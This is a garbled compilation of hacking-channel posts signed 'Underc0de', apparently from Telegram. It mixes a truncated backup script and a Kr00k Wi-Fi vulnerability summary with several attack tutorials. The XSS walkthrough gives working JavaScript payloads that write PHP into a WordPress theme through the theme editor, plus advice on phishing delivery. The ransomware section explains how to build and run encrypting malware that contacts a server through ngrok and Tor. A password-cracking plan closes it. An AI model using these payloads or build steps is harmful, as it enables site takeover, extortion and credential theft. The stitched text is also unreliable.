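    gzip -f "$target" || return 1   # -f overwrites the slot's previous .gz
    printf '%s.gz\n' "$target"
}

# Number of compressed slots currently held for a directory (at most 7).
count_archives() { # $1: directory name
    n=0
    for f in "$BACKUP_DIR"/"$1".[0-6].tar.gz; do
        [ -f "$f" ] && n=$((n + 1))
    done
    echo "$n"
}

# Remove rotated access_log files older than 6 days under a logs directory.
prune_old_logs() { # $1: logs directory
    find "$1" -name access_log -mtime +6 -exec rm -f {} \;
}

# Demo on a constructed tree so the script runs without the real /home layout.
demo=$(mktemp -d)
BACKUP_DIR="$demo/backup"; SRC_ROOT="$demo/src"
mkdir -p "$BACKUP_DIR" "$SRC_ROOT/gnats"
echo "sample problem report" > "$SRC_ROOT/gnats/pr1"
backup_dir gnats                    # e.g. .../backup/gnats.3.tar.gz
count_archives gnats                # prints 1
rm -rf "$demo"
```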
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ AFTER THESE TUTORIALS YOU WILL BE ABLE TO CONFIGURE ANY APACHE SERVER AND FULLY UNDERSTAND HOW IT WORKS
E N J O Y @UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Wi-Fi vulnerability Kr00k exposure: billions of devices worldwide affected CVE
recently from Underc0de Tweets @UndercOdeTC
1) Wi-Fi chips manufactured by Cypress Semiconductor and Broadcom have a serious security vulnerability that leaves billions of devices around the world exposed to hackers, allowing a nearby attacker to decrypt sensitive data in the wireless transmissions around them.
2) The vulnerability was made public during the RSA Security Conference that opened today. For Apple users, this issue has been resolved in the iOS 13.2 and macOS 10.15.1 updates released in late October last year.
3) The security company ESET detailed the vulnerability at the RSA conference. Hackers can use the vulnerability, called Kr00k, to intercept and decrypt WiFi network traffic. It exists in Wi-Fi chips from Cypress and Broadcom, two major brands with high global market share whose chips are used everywhere from laptops to smartphones and from APs to IoT devices.
4) Affected products include Amazon Echo and Kindle, Apple's iPhone and iPad, Google's Pixel, Samsung's Galaxy series, Raspberry Pi, and products from Xiaomi, Asus, Huawei and other brands. A conservative estimate is that one billion devices worldwide are affected by the vulnerability.
5) After a hacker successfully exploits this vulnerability, they can intercept and analyze the wireless network packets sent by the device. Ars Technica stated:
6) Kr00k exploits a vulnerability that occurs when a wireless device disconnects from a wireless access point. If an end-user device or AP hotspot is attacked, it will put all unsent data frames into the send buffer and then send them wirelessly. Instead of using a session key previously negotiated and used during normal connections to encrypt this data, the vulnerable device uses a key consisting of all zeros, which makes decryption impossible.
7) The good news is that the Kr00k bug only affects WiFi connections protected with the WPA2-Personal or WPA2-Enterprise security protocols using AES-CCMP. This means that devices with Broadcom or Cypress WiFi chipsets that use the newest WiFi protocol, WPA3, are not exposed to the attack.
8) According to ESET Research, which published the details, the vulnerability was disclosed to Broadcom and Cypress along with the potentially affected parties. Device patches from most major manufacturers have now been released.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ XSS in WordPress: a full tutorial by UndercOde:
1) One of the most common vulnerabilities in WordPress plugins is cross-site scripting, XSS for short. The basic premise of XSS is that an attacker is able to cause JavaScript to run in somebody else's browser, while they're on a website that the attacker shouldn't be able to control.
2) By the end of this, you'll have introduced a vulnerability, proven that it's vulnerable
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Make your site vulnerable
(Tip: Probably best not to do this on a production site)
There are many ways to make your site vulnerable to XSS. But in the interest of brevity, we'll choose the quickest and easiest way to do it. Create a new post on your WordPress site, as an admin user, switch the editor into Text mode, add this and click publish:
<script>eval(window.location.hash.substring(1))</script>
Congratulations, your site is vulnerable to XSS.
2) Writing a malicious payload
We can do a lot of things. We could create a new user, we could delete all the posts, but today let's do the worst thing possible and execute arbitrary code on the server.
> By default, WordPress lets you edit theme and plugin files. You absolutely should turn this off. Somebody with malicious intentions can do a lot of damage with it. As we're about to find out...
3) You can edit the current theme's functions.php file from /wp-admin/theme-editor.php?file=functions.php
4) Open up your devtools and execute this (no really, don't do this on your production site!):
nc=document.querySelector('#newcontent');nc.value='<?php echo "HACK THE PLANET";phpinfo();exit()?>'+nc.value;nc.form.submit.click()
Ooh, that's going to be annoying. We haven't done too much damage though, so open up functions.php in your text editor and remove the defacement (i.e. replace the first line with <?php).
5) Now we have a proof of concept and a malicious payload we want to execute. We just need to put those pieces together, along with a little extra JavaScript to open that page in an iframe, and we'll have something ready to do some damage...
6) Visit your vulnerable page, and add the following to the end of the URL (you may need to refresh after doing that):
#i=document.createElement('iframe');document.body.appendChild(i);i.src='/wp-admin/theme-editor.php?file=functions.php';window.setTimeout(function(){nc=i.contentDocument.querySelector('#newcontent');nc.value='<?php echo "HACK THE PLANET";phpinfo();exit()?>'+nc.value;nc.form.submit.click()},3000)
Now you've defaced your entire site just by following a link. If you can run arbitrary JavaScript on a WordPress site you can do virtually anything an admin user can do, including (by default) execute arbitrary PHP.
7) Delivery
To deliver your link youβll need to use some social engineering.
Firstly, a URL shortener is handy: a bit.ly link might look suspicious, but less suspicious than a huge URL full of JavaScript.
You could make an email that looks exactly like a Facebook notification. You could even buy a domain name, set it up to redirect to the malicious URL, and rent a billboard outside their office. Get creative.
π¦ We have written an exploit that does a bit of damage.
We learnt that if you can run alert(1) then you can probably run any JavaScript.
We've also learnt that by default, an XSS vulnerability in WordPress allows attackers to run arbitrary PHP code. This is why XSS in WordPress is particularly dangerous.
π¦ Proof of concept
I claimed that your site is vulnerable to XSS, but is it really? Don't take my word for it, let's prove it.
Visit the page you just created, and then add #alert(1) to the end of the URL. (You may need to refresh after doing that).
You should see an alert box saying "localhost says: 1" or just "1".
This is called a "proof of concept". We've proven that we can control the JavaScript running on this site without being admins.
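Two defender-side checks for the conditions this walkthrough relies on, as an added example that is not part of the original tutorial: whether wp-config.php disables the built-in theme/plugin editor (the DISALLOW_FILE_EDIT constant), and whether published post HTML carries inline script tags or the eval(location.hash) sink; the file contents are constructed samples.

```shell
#!/bin/sh
# Added example, not from the original tutorial: defender-side checks for the two
# conditions the walkthrough relies on. (1) the built-in theme/plugin editor must
# be disabled in wp-config.php, so an XSS payload cannot drive theme-editor.php
# into writing PHP; (2) published post HTML should be scanned for inline <script>
# tags and for the eval(location.hash) sink. Contents below are constructed.

# Exit 0 when wp-config.php defines DISALLOW_FILE_EDIT as true, 1 otherwise.
# $1: path to wp-config.php
file_edit_disabled() {
    grep -Eiq "^[[:space:]]*define[[:space:]]*\([[:space:]]*['\"]DISALLOW_FILE_EDIT['\"][[:space:]]*,[[:space:]]*true[[:space:]]*\)" "$1"
}

# Print the line numbers (space separated) of <script> tags in a post/HTML export.
# $1: path to the file; prints nothing when the content is clean.
inline_script_lines() {
    grep -Ein '<script[^>]*>' "$1" | cut -d: -f1 | tr '\n' ' ' | sed 's/ $//'
    return 0
}

# Exit 0 when the file contains an eval(...location.hash...) sink, 1 otherwise.
# $1: path to the file
has_hash_eval_sink() {
    grep -Eiq 'eval[[:space:]]*\([^)]*location\.hash' "$1"
}

# Constructed samples (hypothetical content, not from a real install).
work=$(mktemp -d)
cat > "$work/wp-config.php" <<'EOF'
<?php
define('DB_NAME', 'wordpress');
define('DISALLOW_FILE_EDIT', true);   // removes the theme/plugin editor entirely
EOF
cat > "$work/posts.html" <<'EOF'
<h1>Welcome</h1>
<p>Plain paragraph, nothing to see.</p>
<script>eval(window.location.hash.substring(1))</script>
<p>Another paragraph.</p>
EOF

if file_edit_disabled "$work/wp-config.php"; then echo "file editor: disabled"; fi
echo "script tags on lines: $(inline_script_lines "$work/posts.html")"   # lines: 3
if has_hash_eval_sink "$work/posts.html"; then echo "location.hash eval sink present"; fi
rm -rf "$work"
```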
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Ransomware Updated Tutorial :
t.me/UndercOdeTesting
π¦ Features :
1) Run in background (or not)
2) Encrypt files using AES-256-CTR (Counter Mode) with a random IV for each file. Multithreaded.
3) RSA-4096 to secure the client/server communication.
4) Includes an Unlocker.
5) Optional TOR Proxy support.
6) Use an AES CTR cipher with stream encryption to avoid loading an entire file into memory.
7) Walk all drives by default.
8) Docker image for compilation.
π¦ ππΌππ πππΈβπ :
1) download the project outside your $GOPATH:
2) git clone github.com/mauri870/ransomware
3) cd ransomware
If you have Docker skip to the next section.
4) You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:
export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
Building the project requires a lot of steps, like the RSA key generation, building three binaries and embedding manifest files, so let's leave make to do the job:
5) make deps
make
6) You can build the server for windows with make -e GOOS=windows.
π¦ Docker
./build-docker.sh make
Config Parameters
7) You can change some of the configs during compilation. Instead of running only make, you can use the following variables:
HIDDEN='-H windowsgui' # optional. If present the malware will run in background
USE_TOR=true # optional. If present the malware will download the Tor proxy and use it to contact the server
SERVER_HOST=mydomain.com # the domain used to connect to your server. localhost, 0.0.0.0, 127.0.0.1 works too if you run the server on the same machine as the malware
SERVER_PORT=8080 # the server port, if using a domain you can set this to 80
GOOS=linux # the target os to compile the server. Eg: darwin, linux, windows
Example:
make -e USE_TOR=true SERVER_HOST=mydomain.com SERVER_PORT=80 GOOS=darwin
The SERVER_ variables above only apply to the malware. The server has a flag --port that you can use to change the port that it will listen on.
DON'T RUN ransomware.exe ON YOUR PERSONAL MACHINE, EXECUTE IT ONLY IN A TEST ENVIRONMENT! I'm not responsible if you accidentally encrypt all of your disks!
π¦How it Works :
1) First of all, let's start our external domain:
ngrok http 8080
This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.
2) Let's compile the binaries (remember to replace the domain):
make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.
3) After the build, binaries called ransomware.exe and unlocker.exe, along with a folder called server, are generated in the bin folder. Execution of ransomware.exe and unlocker.exe (even if you use a different GOOS variable during compilation) is locked to Windows machines only.
4) Enter the server directory from another terminal and start it:
cd bin/server && ./server --port 8080
5) To make sure that all is working correctly, make an http request to http://2af7161c.ngrok.io:
curl http://2af7161c.ngrok.io
If you see OK and some logs in the server output you are ready to go.
6) Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.
Then simply run ransomware.exe and see the magic happen.
π¦ I post this ransomware tutorial from its git link for learning, not for harm
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Detailed hack into LINUX server - part 1 (plan)
>Crack the password
1) In the UNIX operating system, all system user passwords are stored in one file, located in the /etc directory and named passwd.
2) If the reader thinks the job is simply to obtain this file and log in to the system with the passwords in it, that is very wrong. The passwd file under UNIX and Linux is special.
3) The passwords of all accounts in it have been encrypted (that is, with the DES encryption method mentioned earlier), and the encryption is one-way, which means there is no way to decrypt them.
4) Still, there are programs that can recover these raw passwords. The author recommends a cracker program, "Cracker Jack", which exhaustively tries the words in a dictionary file.
5) "Cracker Jack" encrypts each word in the dictionary file and then compares the encrypted value with the contents of the password file.
6) If the same result is obtained, the corresponding plaintext password is reported. This software cleverly bypasses the limitation that passwords cannot be decrypted, and uses exhaustive comparison to obtain them. There are many tools that obtain passwords using this principle, and readers can search for them on the Internet.
t.me/UndercOdeTesting
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β